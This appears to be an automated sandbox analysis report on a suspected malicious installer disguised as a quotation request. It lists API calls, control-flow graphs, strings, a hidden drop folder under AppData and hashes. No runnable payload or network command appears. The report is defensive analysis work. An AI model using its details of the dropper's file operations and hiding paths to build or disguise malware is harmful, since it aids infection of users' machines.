                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                  • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                  • API String ID: 900638850-1230650788
                                                                                                                                  • Opcode ID: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
                                                                                                                                  • Instruction ID: 201fcfe404e7502d8ff22bbbb8bc1db0d7d07a9235330109bbd625d5d43c8b09
                                                                                                                                  • Opcode Fuzzy Hash: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
                                                                                                                                  • Instruction Fuzzy Hash: 93612371A40516EBDB209F24CC44AAF37A5EF00314F51813BE546BA2E0D73D8AA2CB4E

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 545 405772-405798 call 405a3d 548 4057b1-4057b8 545->548 549 40579a-4057ac DeleteFileW 545->549 551 4057ba-4057bc 548->551 552 4057cb-4057db call 405eea 548->552 550 40592e-405932 549->550 553 4057c2-4057c5 551->553 554 4058dc-4058e1 551->554 558 4057ea-4057eb call 405981 552->558 559 4057dd-4057e8 lstrcatW 552->559 553->552 553->554 554->550 557 4058e3-4058e6 554->557 560 4058f0-4058f8 call 40622d 557->560 561 4058e8-4058ee 557->561 562 4057f0-4057f4 558->562 559->562 560->550 568 4058fa-40590e call 405935 call 40572a 560->568 561->550 566 405800-405806 lstrcatW 562->566 567 4057f6-4057fe 562->567 569 40580b-405827 lstrlenW FindFirstFileW 566->569 567->566 567->569 585 405910-405913 568->585 586 405926-405929 call 405194 568->586 570 4058d1-4058d5 569->570 571 40582d-405835 569->571 570->554 576 4058d7 570->576 573 405855-405869 call 405eea 571->573 574 405837-40583f 571->574 587 405880-40588b call 40572a 573->587 588 40586b-405873 573->588 577 405841-405849 574->577 578 4058b4-4058c4 FindNextFileW 574->578 576->554 577->573 581 40584b-405853 577->581 578->571 584 4058ca-4058cb FindClose 578->584 581->573 581->578 584->570 585->561 589 405915-405924 call 405194 call 405d84 585->589 586->550 598 4058ac-4058af call 405194 587->598 599 40588d-405890 587->599 588->578 590 405875-40587e call 405772 588->590 589->550 590->578 598->578 602 405892-4058a2 call 405194 call 405d84 599->602 603 4058a4-4058aa 599->603 602->578 603->578
                                                                                                                                  APIs
                                                                                                                                  • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\Request for Quotation New collaboration.exe"), ref: 0040579B
                                                                                                                                  • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\Request for Quotation New collaboration.exe"), ref: 004057E3
                                                                                                                                  • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\Request for Quotation New collaboration.exe"), ref: 00405806
                                                                                                                                  • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\Request for Quotation New collaboration.exe"), ref: 0040580C
                                                                                                                                  • FindFirstFileW.KERNELBASE(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,"C:\Users\user\Desktop\Request for Quotation New collaboration.exe"), ref: 0040581C
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BC
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004058CB
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405780
                                                                                                                                  • "C:\Users\user\Desktop\Request for Quotation New collaboration.exe", xrefs: 0040577B
                                                                                                                                  • \*.*, xrefs: 004057DD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                  • String ID: "C:\Users\user\Desktop\Request for Quotation New collaboration.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                  • API String ID: 2035342205-1875395076
                                                                                                                                  • Opcode ID: 91addf2f7801abc8b01003351af1a773a3a4ecd8c4e6fa2132f7e8029f9d92b7
                                                                                                                                  • Instruction ID: 64b0c8684543101156bed993c7ef625b5cb6937b92a1292c702a5556077473ca
                                                                                                                                  • Opcode Fuzzy Hash: 91addf2f7801abc8b01003351af1a773a3a4ecd8c4e6fa2132f7e8029f9d92b7
                                                                                                                                  • Instruction Fuzzy Hash: 4341B031800914EADF217B619C89ABF7678EF45728F10817BF800B51D1D77C4992DE6E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                                                                  • Instruction ID: edf170fb2c3714e597751af3e8fd03d842b3b080db723bf9ee749212abe0df6d
                                                                                                                                  • Opcode Fuzzy Hash: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                                                                  • Instruction Fuzzy Hash: D3F17771D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A86,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,76F92EE0,00405792,?,C:\Users\user\AppData\Local\Temp\,76F92EE0), ref: 00406238
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00406244
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                  • String ID: WB
                                                                                                                                  • API String ID: 2295610775-2854515933
                                                                                                                                  • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                                                                  • Instruction ID: f398094869b5afba054f99dea52ba5834f85055b19877d8081192ff4b2f0d438
                                                                                                                                  • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                                                                  • Instruction Fuzzy Hash: DAD012319480209BC21037387E0C85B7A59AB493307524AB7F82AF27E0C738AC6586AD
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                                                  • LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 310444273-0
                                                                                                                                  • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                                                                                  • Instruction ID: 46d0f10fa6fb29b22d4bf355a321a76136a9e9be6b3571ea53230c25cba9bd22
                                                                                                                                  • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                                                                                  • Instruction Fuzzy Hash: 02E0CD36A08120ABC7115B309D44D6773BCAFE9601305053DF505F6240C774AC1297A9
                                                                                                                                  APIs
                                                                                                                                  • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Astrolabe, xrefs: 004020FB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateInstance
                                                                                                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Astrolabe
                                                                                                                                  • API String ID: 542301482-4064861044
                                                                                                                                  • Opcode ID: 57f4e40bbc1eb8bc1193217420ff9fbc7ed6710042c31834a7e6d6b3d9fbdd66
                                                                                                                                  • Instruction ID: b9114a0b4d3c9f05545c6126c0c632b8b73b1fcf7d0bd01aa9b6132af3d7cd36
                                                                                                                                  • Opcode Fuzzy Hash: 57f4e40bbc1eb8bc1193217420ff9fbc7ed6710042c31834a7e6d6b3d9fbdd66
                                                                                                                                  • Instruction Fuzzy Hash: 4B414F75A00105BFCB00DFA4C988EAE7BB5AF49318B20416AF505EF2D1D679AD41CB55

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 238 4038b4-4038cc call 406254 241 4038e0-403917 call 405db7 238->241 242 4038ce-4038de call 405e31 238->242 247 403919-40392a call 405db7 241->247 248 40392f-403935 lstrcatW 241->248 251 40393a-403963 call 403b8a call 405a3d 242->251 247->248 248->251 256 4039f5-4039fd call 405a3d 251->256 257 403969-40396e 251->257 263 403a0b-403a30 LoadImageW 256->263 264 4039ff-403a06 call 405f0c 256->264 257->256 259 403974-40399c call 405db7 257->259 259->256 265 40399e-4039a2 259->265 267 403ab1-403ab9 call 40140b 263->267 268 403a32-403a62 RegisterClassW 263->268 264->263 269 4039b4-4039c0 lstrlenW 265->269 270 4039a4-4039b1 call 405962 265->270 281 403ac3-403ace call 403b8a 267->281 282 403abb-403abe 267->282 271 403b80 268->271 272 403a68-403aac SystemParametersInfoW CreateWindowExW 268->272 276 4039c2-4039d0 lstrcmpiW 269->276 277 4039e8-4039f0 call 405935 call 405eea 269->277 270->269 274 403b82-403b89 271->274 272->267 276->277 280 4039d2-4039dc GetFileAttributesW 276->280 277->256 284 4039e2-4039e3 call 405981 280->284 285 4039de-4039e0 280->285 291 403ad4-403af1 ShowWindow LoadLibraryW 281->291 292 403b57-403b5f call 405267 281->292 282->274 284->277 285->277 285->284 293 403af3-403af8 LoadLibraryW 291->293 294 403afa-403b0c GetClassInfoW 291->294 300 403b61-403b67 292->300 301 403b79-403b7b call 40140b 292->301 293->294 296 403b24-403b47 DialogBoxParamW call 40140b 294->296 297 403b0e-403b1e GetClassInfoW RegisterClassW 294->297 303 403b4c-403b55 call 403804 296->303 297->296 300->282 304 403b6d-403b74 call 40140b 300->304 301->271 303->274 304->282
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                                                    • Part of subcall function 00406254: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                                                    • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                                                  • lstrcatW.KERNEL32(1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\,76F93420,00000000,"C:\Users\user\Desktop\Request for Quotation New collaboration.exe"), ref: 00403935
                                                                                                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B5
                                                                                                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C8
                                                                                                                                  • GetFileAttributesW.KERNEL32(Call), ref: 004039D3
                                                                                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet), ref: 00403A1C
                                                                                                                                    • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                  • RegisterClassW.USER32(00428180), ref: 00403A59
                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A71
                                                                                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA6
                                                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403ADC
                                                                                                                                  • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AED
                                                                                                                                  • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF8
                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B08
                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B15
                                                                                                                                  • RegisterClassW.USER32(00428180), ref: 00403B1E
                                                                                                                                  • DialogBoxParamW.USER32(?,00000000,00403C57,00000000), ref: 00403B3D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                  • String ID: "C:\Users\user\Desktop\Request for Quotation New collaboration.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                  • API String ID: 914957316-429850483
                                                                                                                                  • Opcode ID: 8ef44c221ffc76618c9d3063fdfaa19d9e9f68cd4157665c5f0528a7ad94f78d
                                                                                                                                  • Instruction ID: b862c1471ebdc097eb7bd7ac0b5924faedec86185335dcace1f032bfb9465ac2
                                                                                                                                  • Opcode Fuzzy Hash: 8ef44c221ffc76618c9d3063fdfaa19d9e9f68cd4157665c5f0528a7ad94f78d
                                                                                                                                  • Instruction Fuzzy Hash: 5561B670604201BAE720AF669C46E3B3A6CEB45759F40453FF945B62E2CB786D02CA2D

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 309 403c57-403c69 310 403daa-403db9 309->310 311 403c6f-403c75 309->311 313 403e08-403e1d 310->313 314 403dbb-403e03 GetDlgItem * 2 call 40412f SetClassLongW call 40140b 310->314 311->310 312 403c7b-403c84 311->312 315 403c86-403c93 SetWindowPos 312->315 316 403c99-403c9c 312->316 318 403e5d-403e62 call 40417b 313->318 319 403e1f-403e22 313->319 314->313 315->316 321 403cb6-403cbc 316->321 322 403c9e-403cb0 ShowWindow 316->322 328 403e67-403e82 318->328 324 403e24-403e2f call 401389 319->324 325 403e55-403e57 319->325 329 403cd8-403cdb 321->329 330 403cbe-403cd3 DestroyWindow 321->330 322->321 324->325 340 403e31-403e50 SendMessageW 324->340 325->318 327 4040fc 325->327 335 4040fe-404105 327->335 333 403e84-403e86 call 40140b 328->333 334 403e8b-403e91 328->334 338 403cdd-403ce9 SetWindowLongW 329->338 339 403cee-403cf4 329->339 336 4040d9-4040df 330->336 333->334 343 403e97-403ea2 334->343 344 4040ba-4040d3 DestroyWindow EndDialog 334->344 336->327 341 4040e1-4040e7 336->341 338->335 345 403d97-403da5 call 404196 339->345 346 403cfa-403d0b GetDlgItem 339->346 340->335 341->327 350 4040e9-4040f2 ShowWindow 341->350 343->344 351 403ea8-403ef5 call 405f0c call 40412f * 3 GetDlgItem 343->351 344->336 345->335 347 403d2a-403d2d 346->347 348 403d0d-403d24 SendMessageW IsWindowEnabled 346->348 352 403d32-403d35 347->352 353 403d2f-403d30 347->353 348->327 348->347 350->327 379 403ef7-403efc 351->379 380 403eff-403f3b ShowWindow KiUserCallbackDispatcher call 404151 EnableWindow 351->380 357 403d43-403d48 352->357 358 403d37-403d3d 352->358 356 403d60-403d65 call 404108 353->356 356->345 360 403d7e-403d91 SendMessageW 357->360 362 403d4a-403d50 357->362 358->360 361 403d3f-403d41 358->361 360->345 361->356 365 403d52-403d58 call 40140b 362->365 366 403d67-403d70 call 40140b 362->366 377 403d5e 365->377 366->345 375 403d72-403d7c 366->375 375->377 377->356 379->380 383 403f40 380->383 384 403f3d-403f3e 380->384 385 403f42-403f70 GetSystemMenu EnableMenuItem SendMessageW 383->385 384->385 386 403f72-403f83 SendMessageW 385->386 387 403f85 385->387 388 403f8b-403fc9 call 404164 call 405eea lstrlenW call 405f0c SetWindowTextW call 401389 386->388 387->388 388->328 397 403fcf-403fd1 388->397 397->328 398 403fd7-403fdb 397->398 399 403ffa-40400e DestroyWindow 398->399 400 403fdd-403fe3 398->400 399->336 402 404014-404041 CreateDialogParamW 399->402 400->327 401 403fe9-403fef 400->401 401->328 403 403ff5 401->403 402->336 404 404047-40409e call 40412f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 402->404 403->327 404->327 409 4040a0-4040b8 ShowWindow call 40417b 404->409 409->336
                                                                                                                                  APIs
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C93
                                                                                                                                  • ShowWindow.USER32(?), ref: 00403CB0
                                                                                                                                  • DestroyWindow.USER32 ref: 00403CC4
                                                                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CE0
                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403D01
                                                                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D15
                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403D1C
                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403DCA
                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403DD4
                                                                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEE
                                                                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3F
                                                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403EE5
                                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00403F06
                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F18
                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00403F33
                                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F49
                                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 00403F50
                                                                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F68
                                                                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F7B
                                                                                                                                  • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA4
                                                                                                                                  • SetWindowTextW.USER32(?,004226D0), ref: 00403FB8
                                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 004040EC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
